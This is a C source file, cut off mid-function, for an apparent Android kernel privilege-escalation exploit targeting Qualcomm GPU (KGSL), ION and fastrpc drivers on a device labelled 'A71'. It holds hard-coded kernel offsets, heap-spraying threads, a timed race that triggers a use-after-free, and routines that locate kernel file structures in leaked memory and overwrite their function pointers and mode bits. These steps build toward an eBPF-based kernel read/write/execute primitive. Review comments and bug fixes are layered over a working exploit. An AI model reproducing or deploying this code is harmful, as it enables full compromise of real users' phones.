#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <sys/syscall.h>
#include <sched.h>
#include <sys/un.h>
#include <pthread.h>
#include "kgsl_exploit.h"
#include <sys/time.h>

// Kernel-image offsets for the "A71" target named below. Each comment gives the
// two symbols whose address difference the following constant holds.
//A71:
//dma_buf_fops - __bpf_prog_run32
#define DMA_TO_BPF 0x16f2798
//null_fops - __bpf_prog_run32
#define NULL_TO_BPF 0x16c2700
//__bpf_prog_run32 - __bpf_call_base
#define BPF_TO_BASE 0x18f8

// SPRAY_1 is defined unconditionally here, so every `#ifdef SPRAY_1` in this
// file is taken and every `#ifndef SPRAY_1` is skipped.
#define SPRAY_1 1
// Number of pipe / reader-thread pairs created by do_one_rw().
#define PIPE 1

// Iteration count of the empty delay loop in trigger_uaf().
#define DELAY 4000
// Size in bytes of g_realloc_data (the sendmsg control buffer).
#define OBJ_SIZE 37
// Number of scatterlist entries filled in by init_realloc_data().
#define NENTS 1
// Number of realloc_thread instances started by do_one_rw().
#define NB_REALLOC_THREADS 8
// Allocation length for the second spray round in spray_system_heap().
#define SYS_LEN 0x1000
// Allocation length for the first spray round in spray_system_heap().
#define SYS_LEN_0 0xf000
// Number of first-round allocations; values between 320*16 and 480*16 seemed to work.
#define REGIONS_LEN_1 (480 * 16)
// Number of second-round allocations.
#define REGIONS_LEN_2 (1024)
// dma_address value that main() passes to do_one_rw().
#define DMA_ADDRESS 0xfffbf000
// Not referenced anywhere in the visible source.
#define DMA_PAGES 64
// Number of single-page mappings created at the tail of the large ION buffer
// by init_tmp_region().
#define VMAS_LEN 50
// log2 of the large ION allocation size; also fed to compute_alignment().
#define ORDER 26
// Threshold (microseconds) on the duration measured in trigger_uaf(); main()
// and do_one_rw() compare trigger_time against it.
#define TRIGGER_THRESH 1000
// Number of entries in bounce_regions / bounce_fds.
#define BOUNCE_LEN 64
// Number of /dev/null descriptors opened by spray_system_heap().
#define SLAB_LEN 5000
// CPU indices passed to migrate_to_cpu().
#define CPU0 0
#define CPU1 1

// MMAP_LEN: number of anonymous pages mapped in main().
// G_REGION_LEN: number of pages mapped by ion_map() and slots in g_ion_regions.
// Both depend on whether DMA_SPRAY is defined by the build.
#ifdef DMA_SPRAY
  #define MMAP_LEN 64
  #ifdef SPRAY_1
    #define G_REGION_LEN 4
  #else
    #define G_REGION_LEN 3
   #endif
#else
    #define MMAP_LEN 65
  #ifdef SPRAY_1
    #define G_REGION_LEN 2
  #else
    #define G_REGION_LEN 1
  #endif
#endif

// Cross-thread flags. The main thread (do_one_rw) sets them to 1 and worker
// threads spin on them; reset_globals() clears them again.
// Incremented by each realloc_thread once it is ready.
static volatile size_t g_nb_realloc_thread_ready = 0;
// Releases the realloc threads.
static volatile size_t g_realloc_now = 0;
// Releases trigger_uaf().
static volatile size_t g_trigger_now = 0;
// Releases ion_map() (only polled when SPRAY_1 is defined).
static volatile size_t g_map_now = 0;
// Releases gpu_import().
static volatile size_t g_import_now = 0;
// Lets read_pipe() return.
static volatile size_t g_finished_read = 0;
// Set by read_pipe() once its read() has returned.
static volatile size_t g_unlocked_read = 0;
// Mappings created by ion_map().
// NOTE(review): `volatile` here qualifies the pointed-to chars, not the array
// slots themselves, although the slots are polled from another thread.
static volatile char* g_ion_regions[G_REGION_LEN] = {0};
// User mappings and descriptors of the buffers chosen in spray_system_heap().
static char* bounce_regions[BOUNCE_LEN];
static int bounce_fds[BOUNCE_LEN];
// Same mappings as bounce_regions; only the first BOUNCE_LEN slots are ever
// written in the visible code.
static char* ion_sys_regions[REGIONS_LEN_1 + REGIONS_LEN_2] = {0};
// Descriptors from the first and second spray rounds respectively.
static int ion_sys_fds[REGIONS_LEN_1] = {0};
static int ion_sys_fds2[REGIONS_LEN_2] = {0};
// Duration in microseconds of the sync ioctl, measured in trigger_uaf().
static long trigger_time = 0;
// Addresses computed by find_null_fops() / find_dma_fops().
static unsigned long ion_addr = 0;
static unsigned long bpf_addr = 0;

//-------eBPF program, from https://googleprojectzero.blogspot.com/2020/12/an-ios-hacker-tries-android.html -------------------------------------------------------

// Byte offsets into the data area used by the eBPF program that main() builds.
//
// The program reads an operation code ('r', 'w' or 'x') from the data area,
// reads that operation's parameters from the same area, performs it, and
// stores the result back into the area.
// Offset of the operation code.
static int bpf_op_offset = 0x000;
// Offset of the address used by the 'r' and 'w' operations.
static int bpf_rw_addr_offset = 0x008;
// Offset at which the program stores its result.
static int bpf_out_offset = 0x108;
// Offsets of the five arguments used by 'x'; bpf_arg0 is also the value
// written by 'w'.
static int bpf_arg0 = 0x10;
static int bpf_arg1 = 0x18;
static int bpf_arg2 = 0x20;
static int bpf_arg3 = 0x28;
static int bpf_arg4 = 0x30;

//---------------------------------sendmsg heap spraying, from https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html ---------------------------------

// Local definitions of the CPU-affinity mask type and helpers used by
// migrate_to_cpu().
// NOTE(review): these names are also provided by <sched.h> when GNU extensions
// are enabled, and identifiers starting with "__" are reserved — confirm this
// does not clash with the toolchain headers in use.

// Number of CPUs representable in the mask.
#define CPU_SETSIZE 1024
// Number of bits held by one word of the mask.
#define __NCPUBITS  (8 * sizeof (unsigned long))
typedef struct
{
   unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
} cpu_set_t;

// Set the bit for `cpu` in the mask pointed to by `cpusetp`.
#define CPU_SET(cpu, cpusetp) \
  ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
// Clear every bit of the mask pointed to by `cpusetp`.
#define CPU_ZERO(cpusetp) \
  memset((cpusetp), 0, sizeof(cpu_set_t))

/*
 * Put every cross-thread flag and every g_ion_regions slot back to zero so
 * that the next do_one_rw() round starts from a clean state.
 */
void reset_globals() {
  int slot = 0;

  g_nb_realloc_thread_ready = 0;
  g_realloc_now = 0;
  g_trigger_now = 0;
  g_map_now = 0;
  g_import_now = 0;
  g_finished_read = 0;
  g_unlocked_read = 0;

  /* Forget the mappings recorded by ion_map(). */
  while (slot < G_REGION_LEN) {
    g_ion_regions[slot] = 0;
    slot++;
  }
}

/*
 * Pin the calling thread to a single CPU.
 *
 * cpu_num: index of the CPU the thread should run on.
 *
 * Exits the process through err() when sched_setaffinity fails.
 */
void migrate_to_cpu(int cpu_num) {
    pid_t self = gettid();
    cpu_set_t mask;

    /* Build a mask that contains only the requested CPU. */
    CPU_ZERO(&mask);
    CPU_SET(cpu_num, &mask);

    if (syscall(__NR_sched_setaffinity, self, sizeof(mask), &mask) != 0)
    {
        err(1, "Error in the syscall setaffinity");
    }
}

// Control-message buffer that every realloc_thread passes to sendmsg().
// It is OBJ_SIZE bytes long and is filled in by init_realloc_data().
static volatile char g_realloc_data[OBJ_SIZE];

/*
 * Fill g_realloc_data.
 *
 * The same bytes are written through two views of the buffer: first as a
 * struct cmsghdr (cmsg_len and cmsg_level), then as an array of NENTS
 * struct scatterlist entries. The scatterlist writes come last, so they win
 * wherever the two layouts overlap.
 *
 * dma_address: value stored in each entry's dma_address field.
 * length:      value stored in each entry's length and dma_length fields.
 *
 * Always returns 0.
 *
 * NOTE(review): struct scatterlist is not declared in this file (presumably it
 * comes from kgsl_exploit.h). Whether NENTS entries fit inside OBJ_SIZE bytes,
 * and whether a char array is suitably aligned for these struct accesses,
 * cannot be confirmed from here.
 * NOTE(review): both casts drop the buffer's volatile qualifier.
 */
int init_realloc_data(uint64_t dma_address, size_t length) {
  struct cmsghdr *first;
  struct scatterlist* scatter_view; 

  // Header view: advertise the whole buffer as one control message.
  first = (struct cmsghdr*) g_realloc_data;
  first->cmsg_len = sizeof(g_realloc_data);
  first->cmsg_level = 0;

  // Scatterlist view over the same bytes.
  scatter_view = (struct scatterlist*) g_realloc_data;
  for (int i = 0; i < NENTS; i++) {
    scatter_view[i].length = length;
    scatter_view[i].dma_length = length;
    scatter_view[i].dma_address = dma_address;
  }
  return 0;  
}

// Per-thread state for one realloc_thread: its thread id, a connected pair of
// AF_UNIX datagram sockets, and the address the receiving socket is bound to.
struct realloc_thread_arg
{
  pthread_t tid;            // filled in by pthread_create() in init_reallocation()
  int recv_fd;              // socket bound to `addr`
  int send_fd;              // socket connected to `addr`
  struct sockaddr_un addr;  // address set up by init_unix_sockets()
};

/*
 * Create the socket pair used by one realloc thread.
 *
 * Two AF_UNIX datagram sockets are created; recv_fd is bound to a name that is
 * unique per call (thread id plus a counter, stored after a leading NUL byte
 * in sun_path) and send_fd is connected to that name.
 *
 * rta: thread argument whose recv_fd, send_fd and addr fields are filled in.
 *
 * Returns 0 on success. On failure returns -1 with both descriptors closed and
 * set to -1, so nothing is leaked. A setsockopt() failure terminates the
 * process through err(), as before.
 */
int init_unix_sockets(struct realloc_thread_arg * rta) {
  struct timeval tv;
  static int sock_counter = 0;

  /* Known state so the failure path can tell which descriptors are open. */
  rta->recv_fd = -1;
  rta->send_fd = -1;

  if (((rta->recv_fd = socket(AF_UNIX, SOCK_DGRAM, 0)) < 0) ||
      ((rta->send_fd = socket(AF_UNIX, SOCK_DGRAM, 0)) < 0))
  {
    perror("[-] socket");
    goto fail;
  }

  memset(&rta->addr, 0, sizeof(rta->addr));
  rta->addr.sun_family = AF_UNIX;
  /* Bounded write; the first byte of sun_path stays 0. */
  snprintf(rta->addr.sun_path + 1, sizeof(rta->addr.sun_path) - 1,
           "sock_%x_%d", (unsigned int)gettid(), ++sock_counter);
  if (bind(rta->recv_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))
  {
    perror("[-] bind");
    goto fail;
  }

  if (connect(rta->send_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))
  {
    perror("[-] connect");
    goto fail;
  }

  /* An all-zero timeval is passed as the send timeout. */
  memset(&tv, 0, sizeof(tv));
  if (setsockopt(rta->recv_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) {
    err(1, "setsockopt");
  }

  return 0;
fail:
  printf("[-] failed to initialize UNIX sockets!\n");
  if (rta->recv_fd >= 0) {
    close(rta->recv_fd);
    rta->recv_fd = -1;
  }
  if (rta->send_fd >= 0) {
    close(rta->send_fd);
    rta->send_fd = -1;
  }
  return -1;
}

/*
 * Thread body started by init_reallocation().
 *
 * arg: pointer to this thread's struct realloc_thread_arg.
 *
 * The thread pins itself to CPU0, sends non-blocking datagrams until sendmsg()
 * fails with EAGAIN, reports itself ready, waits for g_realloc_now, and then
 * issues one blocking sendmsg() that carries g_realloc_data as control data.
 *
 * Always returns NULL; failures are only reported on stdout/stderr.
 */
static void* realloc_thread(void *arg)
{
  struct realloc_thread_arg *rta = (struct realloc_thread_arg*) arg;
  struct msghdr mhdr;
  char buf[200];

  // initialize msghdr
  struct iovec iov = {
    .iov_base = buf,
    .iov_len = sizeof(buf),
  };
  memset(&mhdr, 0, sizeof(mhdr));
  mhdr.msg_iov = &iov;
  mhdr.msg_iovlen = 1;

  // the thread should inherit main thread cpumask, better be sure and redo-it!
  migrate_to_cpu(CPU0);

  // make it block
  while (sendmsg(rta->send_fd, &mhdr, MSG_DONTWAIT) > 0);

  if (errno != EAGAIN)
  { 
    perror("[-] sendmsg");
    goto fail;
  }

  // use the arbitrary data now
  iov.iov_len = 16; // don't need to allocate lots of memory in the receive queue
  mhdr.msg_control = (void*)g_realloc_data; // use the ancillary data buffer
  mhdr.msg_controllen = sizeof(g_realloc_data);

  // Several threads bump this counter. A plain `++` on a volatile is a
  // non-atomic read-modify-write and can lose an update, which would leave
  // init_reallocation() waiting forever. Use an atomic add instead.
  __atomic_fetch_add(&g_nb_realloc_thread_ready, 1, __ATOMIC_SEQ_CST);

  while (!g_realloc_now) // spin until the main thread gives the go-ahead
    ;

  // the next call should block while "reallocating"
  if (sendmsg(rta->send_fd, &mhdr, 0) < 0)
  {
    perror("[-] sendmsg");
    goto fail;
  }
  printf("[+] REALLOC THREAD finished\n");
  return NULL;

fail:
  printf("[-] REALLOC THREAD FAILURE!!!\n");
  return NULL;
}

/*
 * Prepare the shared control buffer and start the realloc threads.
 *
 * rta:         array of nb_reallocs thread arguments, filled in here.
 * nb_reallocs: number of threads to start.
 * dma_address: forwarded to init_realloc_data().
 * length:      forwarded to init_realloc_data().
 *
 * Blocks until every started thread has reported itself ready through
 * g_nb_realloc_thread_ready.
 *
 * Returns 0 on success, -1 if the data, a socket pair or a thread could not
 * be set up.
 */
int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs, uint64_t dma_address, size_t length)
{
  if (init_realloc_data(dma_address, length))
  {
    printf("[-] failed to initialize reallocation data!\n");
    goto fail;
  }
  printf("[+] reallocation data initialized!\n");

  printf("[ ] initializing reallocation threads, please wait...\n");
  for (size_t thread = 0; thread < nb_reallocs; ++thread)
  {
    int ret;

    if (init_unix_sockets(&rta[thread]))
    {
      printf("[-] failed to init UNIX sockets!\n");
      goto fail;
    }

    // pthread_create() returns the error number and leaves errno alone, so
    // perror() would print an unrelated message; format the code ourselves.
    ret = pthread_create(&rta[thread].tid, NULL, realloc_thread, &rta[thread]);
    if (ret != 0)
    {
      fprintf(stderr, "[-] pthread_create: %s\n", strerror(ret));
      goto fail;
    }
  }

  // Wait until every thread has filled its socket and is parked.
  while (g_nb_realloc_thread_ready < nb_reallocs)
    sched_yield();

  printf("[+] %zu reallocation threads ready!\n", nb_reallocs);

  return 0;

fail:
  printf("[-] failed to initialize reallocation\n");
  return -1;
}

//------------------------ Specifics to trigger the bug-------------------------------------

// Argument block for trigger_uaf().
struct trigger_uaf_arg {
  int fd;             // descriptor the DMA_BUF_IOCTL_SYNC ioctl is issued on
  unsigned int read;  // non-zero selects the READ flag set, zero the RW|END set
};

/*
 * Thread body: issue one timed DMA_BUF_IOCTL_SYNC on arg->fd.
 *
 * arg: pointer to a struct trigger_uaf_arg owned by the caller.
 *
 * The thread pins itself to CPU1, builds the sync flags, spins until
 * g_trigger_now is set, runs an empty DELAY-iteration loop, and then measures
 * how long the ioctl takes. The duration in microseconds is stored in the
 * global trigger_time and printed. Always returns NULL.
 *
 * NOTE(review): the ioctl's return value is not checked.
 * NOTE(review): the delay loop has an empty body, so an optimising compiler
 * may remove it entirely; `micros_used` is declared but never used.
 */
void* trigger_uaf(void* arg) {

  migrate_to_cpu(CPU1);
  struct trigger_uaf_arg* trigger_arg = (struct trigger_uaf_arg*)arg;
  struct dma_buf_sync sync;
  struct timeval start, end;
  long micros_used, secs_used;
  if (trigger_arg->read) {
    sync.flags = DMA_BUF_SYNC_READ;
  } else {
    sync.flags = DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END;
  }
  sync.flags |= DMA_BUF_SYNC_USER_MAPPED;
  // Wait for the main thread's go-ahead, then burn a short fixed delay.
  while (!g_trigger_now);
  for (int i = 0; i < DELAY; i++);
  gettimeofday(&start, NULL);
  ioctl(trigger_arg->fd, DMA_BUF_IOCTL_SYNC, (unsigned long)(&sync));
  gettimeofday(&end, NULL);
  secs_used=(end.tv_sec - start.tv_sec); //avoid overflow by subtracting first
  trigger_time = ((secs_used*1000000) + end.tv_usec) - (start.tv_usec);
  printf("micros_used: %ld\n",trigger_time);  
  return NULL;
}

/*
 * Thread body: block in read() on a pipe until the main thread writes to it.
 *
 * arg: pointer to an int holding the read end of the pipe.
 *
 * After the read returns the thread sets g_unlocked_read, closes the
 * descriptor, and then spins until g_finished_read is set. Always returns
 * NULL. The result of read() is not examined.
 */
void* read_pipe(void* arg) {
  int scratch[80];
  int read_end;

  migrate_to_cpu(CPU1);
  read_end = *((int*)arg);

  read(read_end, scratch, sizeof(scratch));
  g_unlocked_read = 1;
  close(read_end);

  /* Stay alive until the main thread releases us. */
  while (g_finished_read == 0) {
  }
  return NULL;
}

/*
 * Map G_REGION_LEN consecutive pages of a buffer and record them in
 * g_ion_regions.
 *
 * arg: pointer to an int holding the descriptor to map.
 *
 * Runs on CPU0. When SPRAY_1 is defined it first waits for g_map_now. Page k
 * is mapped privately, read/write, at file offset k * 0x1000. Any mmap failure
 * terminates the process through err(). Always returns NULL.
 */
void* ion_map(void* arg) {
  int map_fd;
  int page = 0;

  migrate_to_cpu(CPU0);
  map_fd = *((int*)arg);
#ifdef SPRAY_1
  while (!g_map_now) {
  }
#endif
  while (page < G_REGION_LEN) {
    g_ion_regions[page] = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE, map_fd, page * 0x1000);
    if (g_ion_regions[page] == MAP_FAILED) {
      err(1, "ion region map %d failed", page);
    }
    page++;
  }
  return NULL;
}

/*
 * Thread body: issue one IOCTL_KGSL_GPUOBJ_IMPORT once g_import_now is set.
 *
 * arg: pointer to a struct kgsl_gpuobj_import. On entry its `id` field carries
 *      the kgsl descriptor to use; the field is reset to 0 before the ioctl.
 *
 * Runs on CPU0. When SPRAY_1 is not defined, the g_ion_regions mappings are
 * unmapped just before the ioctl. An ioctl failure terminates the process
 * through err(). Always returns NULL.
 */
void* gpu_import(void* arg) {
  struct kgsl_gpuobj_import* request;
  int kgsl_fd;

  migrate_to_cpu(CPU0);
  request = (struct kgsl_gpuobj_import*)arg;

  /* The descriptor travels in the id field; take it out and clear the field. */
  kgsl_fd = request->id;
  request->id = 0;

  while (!g_import_now) {
  }
#ifndef SPRAY_1
  for (int page = 0; page < G_REGION_LEN; page++) {
    munmap((void*)(g_ion_regions[page]), 0x1000);
  }
#endif
  if (ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, request) < 0) {
      err(1, "IOCTL_KGSL_GPUOBJ_IMPORT 2 failed.\n");
  }
  return NULL;
}

/*
 * Encode `power` into bits 16..23 of a flags word.
 *
 * power: value to encode; only its low 8 bits survive the mask.
 *
 * Returns (power << 16) & 0xFF0000.
 */
uint64_t compute_alignment(size_t power) {
  const size_t shifted = power << 16;
  const size_t field = shifted & 0xFF0000;

  return (uint64_t)field;
}

//Fill out kgsl memory so the next one will fail
void prepare_gpu_import(int kgsl_fd, uint64_t* regions) {

  for (int i = 0; i < MMAP_LEN - 1; i++) {
    struct kgsl_gpuobj_import par;
    struct kgsl_gpuobj_import_useraddr useraddr = {.virtaddr = regions[i]};
    par.flags = compute_alignment(ORDER);
    par.priv = (uint64_t)(&useraddr);
    par.type = KGSL_USER_MEM_TYPE_ADDR;
    par.priv_len = 0x1000;
    par.id = 0;
    if (ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &par) < 0) {
      err(1, "IOCTL_KGSL_GPUOBJ_IMPORT %d\n", i);
    }
  }
}

//-----------------------------------bounce buffer and buddy heap spraying--------------------

// State produced by allocate_bounce_buffer() / spray_system_heap().
// Only rpc_fd, ion_fd and null_fds are written in the visible code; the other
// members are never touched here.
struct bounce_buffer_param {
  int rpc_fd;               // set at the end of allocate_bounce_buffer()
  int ion_fd;               // /dev/ion descriptor opened by allocate_bounce_buffer()
  int process_fd;
  int args_fd;
  char* process_region;
  char* args_region;
  char* sys_region;
  int null_fds[SLAB_LEN];   // /dev/null descriptors opened by spray_system_heap()
};

/*
 * Allocate a large number of ION buffers and /dev/null files, then map the
 * buffers that will serve as bounce regions.
 *
 * ion_fd: open /dev/ion descriptor used for every allocation.
 * param:  receives the /dev/null descriptors in param->null_fds.
 *
 * Steps, in order:
 *   1. REGIONS_LEN_1 allocations of SYS_LEN_0 bytes -> ion_sys_fds[].
 *   2. REGIONS_LEN_2 allocations of SYS_LEN bytes   -> ion_sys_fds2[].
 *   3. SLAB_LEN opens of /dev/null                  -> param->null_fds[].
 *   4. Slots 0 and 2..BOUNCE_LEN-1 of bounce_regions / ion_sys_regions /
 *      bounce_fds are taken from ion_sys_fds2[REGIONS_LEN_2 - 1 - BOUNCE_LEN + i].
 *   5. Slot 1 is taken from the last second-round buffer,
 *      ion_sys_fds2[REGIONS_LEN_2 - 1].
 *
 * Any allocation or mmap failure terminates the process through err().
 *
 * NOTE(review): the results of open("/dev/null") are not checked.
 * NOTE(review): the BOUNCE_LEN < 2 test compares a compile-time constant at
 * run time and reports through err(), which also prints an unrelated errno.
 */
void spray_system_heap(int ion_fd, struct bounce_buffer_param* param) {
  //First round spraying, use large chunk up the memory pool.
  for (int i = 0; i < REGIONS_LEN_1; i++) {
	struct ion_allocation_data ion_alloc_data;
	ion_alloc_data.len = SYS_LEN_0;
	ion_alloc_data.flags = 1;
	ion_alloc_data.heap_id_mask = ION_HEAP(25);

    if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) {
      err(1, "ION_IOC_ALLOC bounce failed\n");
    }
    ion_sys_fds[i] = ion_alloc_data.fd;
  }
  //Second round spraying, use single page so we can map it to bounce buffer.
  for (int i = 0; i < REGIONS_LEN_2; i++) {
	struct ion_allocation_data ion_alloc_data;
	ion_alloc_data.len = SYS_LEN;
	ion_alloc_data.flags = 1;
	ion_alloc_data.heap_id_mask = ION_HEAP(25);

    if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) {
      err(1, "ION_IOC_ALLOC bounce failed\n");
    }
    ion_sys_fds2[i] = ion_alloc_data.fd;
  }

  //Spray with null files to create new slab 
  for (int i = 0; i < SLAB_LEN; i++) {
    param->null_fds[i] = open("/dev/null", 0);
  }

  
  //set the top and bottom as bounce regions
  if (BOUNCE_LEN < 2) {
    err(1, "bounce len has to be greater than or equal to 2\n");
  }
  //Use region2 to map the rest of the bounce buffer.
  for (int i = 0; i < BOUNCE_LEN; i++) {
    // Slot 1 is filled separately after this loop.
    if (i == 1) continue;
    bounce_regions[i] = ion_sys_regions[i] = mmap(NULL, SYS_LEN, PROT_READ | PROT_WRITE, MAP_SHARED, ion_sys_fds2[REGIONS_LEN_2 - 1 - BOUNCE_LEN + i], 0);
    if (bounce_regions[i] == MAP_FAILED) {
      err(1, "bounce regions failed\n");
    }
    bounce_fds[i] = ion_sys_fds2[REGIONS_LEN_2 - 1 - BOUNCE_LEN + i];
  }
  //The last second-round buffer is mapped as bounce region 1.
  //NOTE(review): the original comment here spoke of the "last of region 1",
  //but the code indexes ion_sys_fds2 (the second round) - confirm the intent.
  bounce_regions[1] = ion_sys_regions[1] = mmap(NULL, SYS_LEN, PROT_READ | PROT_WRITE, MAP_SHARED, ion_sys_fds2[REGIONS_LEN_2 - 1], 0);
  if (bounce_regions[1] == MAP_FAILED) {
    err(1, "bounce regions failed\n");
  }
  bounce_fds[1] = ion_sys_fds2[REGIONS_LEN_2 - 1];
}

/*
 * Open the ION and fastrpc devices, run spray_system_heap(), and issue one
 * FASTRPC_IOCTL_INVOKE_ATTRS per bounce buffer descriptor.
 *
 * param: receives the opened descriptors in param->ion_fd and param->rpc_fd
 *        (and the /dev/null descriptors through spray_system_heap()).
 *
 * Failure to open either device, or a failing FASTRPC_IOCTL_GETINFO,
 * terminates the process through err(). The result of each INVOKE_ATTRS ioctl
 * is deliberately left unexamined, as in the original.
 *
 * Fix: the original stored an uninitialised local (`rpc_fd`) in param->rpc_fd
 * instead of the descriptor it had actually opened.
 */
void allocate_bounce_buffer(struct bounce_buffer_param* param) {

  int ion_fd = open("/dev/ion", O_RDONLY);
  if (ion_fd == -1) {
    err(1, "cannot open ion\n");
  }

  spray_system_heap(ion_fd, param);

  int rpc_id = open("/dev/adsprpc-smd", 0);
  if (rpc_id == -1) {
    err(1, "cannot open rpc\n");
  }
  printf("rpc opened\n");
  uint32_t info_ptr[1];
  info_ptr[0] = 3;

  if(ioctl(rpc_id, FASTRPC_IOCTL_GETINFO, info_ptr) < 0) {
    err(1, "rpc getinfo failed\n");
  }

  for (int i = 0; i < BOUNCE_LEN; i++) {
    /* One invoke request per bounce descriptor. */
    struct remote_dma_handle dma = {.fd = bounce_fds[i], .offset = 0};
    union remote_arg args[1];
    args[0].dma = dma;

    struct fastrpc_ioctl_invoke invoke = {0};
    invoke.handle = 0x3;
    invoke.sc = 16;
    invoke.pra = &(args[0]);
    unsigned int attrs = 16;
    struct fastrpc_ioctl_invoke_attrs crc;
    crc.inv = invoke;
    crc.attrs = &attrs;
    crc.fds = &(bounce_fds[i]);
    ioctl(rpc_id, FASTRPC_IOCTL_INVOKE_ATTRS, &crc);
  }
  param->rpc_fd = rpc_id;
  param->ion_fd = ion_fd;
  return;
}

void sync_bounce_buffer(int read, int index) {
  struct dma_buf_sync sync;
  sync.flags = DMA_BUF_SYNC_RW;
  if (read) {
    sync.flags |= DMA_BUF_SYNC_END;
  }
  if (ioctl(bounce_fds[index], DMA_BUF_IOCTL_SYNC, (unsigned long)(&sync)) < 0) {
    err(1, "error syncing bounce buffer %d\n", index);
  }
}

/*
 * Run sync_bounce_buffer() over all BOUNCE_LEN slots, in ascending order.
 *
 * read: forwarded unchanged to sync_bounce_buffer().
 */
void sync_bounce_buffers(int read) {
  int slot = 0;

  printf("[+] syncing bounce buffers\n");
  while (slot < BOUNCE_LEN) {
    sync_bounce_buffer(read, slot);
    slot++;
  }
}

//----------------------------Utils for finding addresses and faking objects------------------------------------

/*
 * Derive an address from a pointer value read out of a mapped region.
 *
 * offset: byte offset, inside the region, of the structure found by the
 *         search functions.
 * region: index into ion_sys_regions where that structure was found.
 *
 * The word at offset + 0x38 is read (the original author describes it as the
 * wait_list pointer of a struct file, i.e. a pointer to its own location).
 * The function then subtracts that field's position,
 * offset + 0x38 + (region - 2) * SYS_LEN, and one further SYS_LEN.
 *
 * Returns the resulting address and prints the word that was read.
 */
unsigned long calculate_ion_addr(long offset, int region) {
  long field_off = offset + 0x38;
  long span = field_off + (region - 2)* SYS_LEN;
  char* field = ion_sys_regions[region] + field_off;
  unsigned long* self_ptr = (unsigned long*)field;

  printf("null file addr: %lx\n", *self_ptr);
  return *self_ptr - span - SYS_LEN;
}

/*
 * Replace the second machine word of the structure at `offset` in mapped
 * region `region` with `ion_addr`, printing the previous value first.
 *
 * region:   index into ion_sys_regions.
 * offset:   byte offset of the structure inside that region.
 * ion_addr: value to store (this parameter shadows the global of the same name).
 */
void overwrite_fops(int region, long offset, unsigned long ion_addr) {
  char* base = ion_sys_regions[region] + offset;
  unsigned long* slot = (unsigned long*)base + 1;

  printf("overwrite fops %lx\n", *slot);
  *slot = ion_addr;
}
/*
 * Set bit 0x4 in the 32-bit word at offset + 0x28 of the structure found in
 * mapped region `region`, printing the previous value first. Per the original
 * author's note this is the file mode, and the bit allows lseek.
 *
 * region: index into ion_sys_regions.
 * offset: byte offset of the structure inside that region.
 *
 * Fix: the log line used to say "overwrite fops" (copied from
 * overwrite_fops) although the value printed is the mode word.
 */
void overwrite_fmode(int region, long offset) {
  long fmode_offset = offset + 0x28;
  unsigned int* fmode = (unsigned int*)(&(ion_sys_regions[region][fmode_offset]));
  printf("overwrite fmode %x\n", fmode[0]);
  //Add fmode lseek
  *fmode |= 0x4;
  return;
}

/*
 * Scan `data` in 16-byte steps for the byte pattern observed in a /dev/null
 * file structure.
 *
 * data:   buffer to scan.
 * len:    number of valid bytes in `data`.
 * result: receives the machine word stored 8 bytes into the most recent
 *         window whose bytes 16..47 matched the pattern. It is written on
 *         every pattern match, including matches rejected afterwards.
 *
 * A window is accepted only if that word has its top 16 bits all set.
 *
 * Returns the byte offset of the accepted window, or -1 if none is found.
 *
 * Fix: the original looped on `while (left)` and subtracted 16 each round, so
 * a `len` that is not a multiple of 16 wrapped the unsigned counter and the
 * scan ran past the end of the buffer. The loop now stops as soon as fewer
 * than 64 bytes remain, which gives the same result for every length the
 * original handled correctly. The word is read with memcpy rather than
 * through a cast pointer.
 */
long search_null_fops(char* data, size_t len, unsigned long* result) {
  //Observed pattern of a null file struct. These are right after the null_fops
  static const char null_pattern[32] = {
    0, 0, 0,   0, 0,    0, 0,   0, 0x1, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0x2, 0, 0x1d, 0, 0x2, 0, 0,   0, 0, 0, 0, 0, 0, 0
  };
  size_t left = len;
  char* curr = data;

  while (left >= 64) {
    if (!memcmp(curr + 16, null_pattern, sizeof(null_pattern))) {
      unsigned long candidate;

      /* Second machine word of the window. */
      memcpy(&candidate, curr + sizeof(candidate), sizeof(candidate));
      *result = candidate;
      if ((candidate >> 48) == 0xffff) {
        return curr - data;
      }
    }
    curr += 16;
    left -= 16;
  }
  return -1;
}

/*
 * Scan `data` in 16-byte steps for the byte pattern observed in a dma-buf
 * file structure.
 *
 * data:   buffer to scan.
 * len:    number of valid bytes in `data`.
 * result: receives the machine word stored 8 bytes into the most recent
 *         window whose bytes 16..47 matched the pattern. It is written on
 *         every pattern match, including matches rejected afterwards.
 *
 * A window is accepted only if that word has its top 16 bits all set.
 *
 * Returns the byte offset of the accepted window, or -1 if none is found.
 *
 * Fix: the original looped on `while (left)` and subtracted 16 each round, so
 * a `len` that is not a multiple of 16 wrapped the unsigned counter and the
 * scan ran past the end of the buffer. The loop now stops as soon as fewer
 * than 64 bytes remain, which gives the same result for every length the
 * original handled correctly. The word is read with memcpy rather than
 * through a cast pointer.
 */
long search_dma_fops(char* data, size_t len, unsigned long* result) {
  //Observed pattern of a dma file struct. These are right after the dma_fops
  static const char dma_pattern[32] = {
    0,   0, 0, 0, 0,   0, 0, 0, 0x1, 0, 0, 0, 0, 0, 0, 0,
    0x2, 0, 0, 0, 0x7, 0, 0, 0, 0,   0, 0, 0, 0, 0, 0, 0
  };
  size_t left = len;
  char* curr = data;

  while (left >= 64) {
    if (!memcmp(curr + 16, dma_pattern, sizeof(dma_pattern))) {
      unsigned long candidate;

      /* Second machine word of the window. */
      memcpy(&candidate, curr + sizeof(candidate), sizeof(candidate));
      *result = candidate;
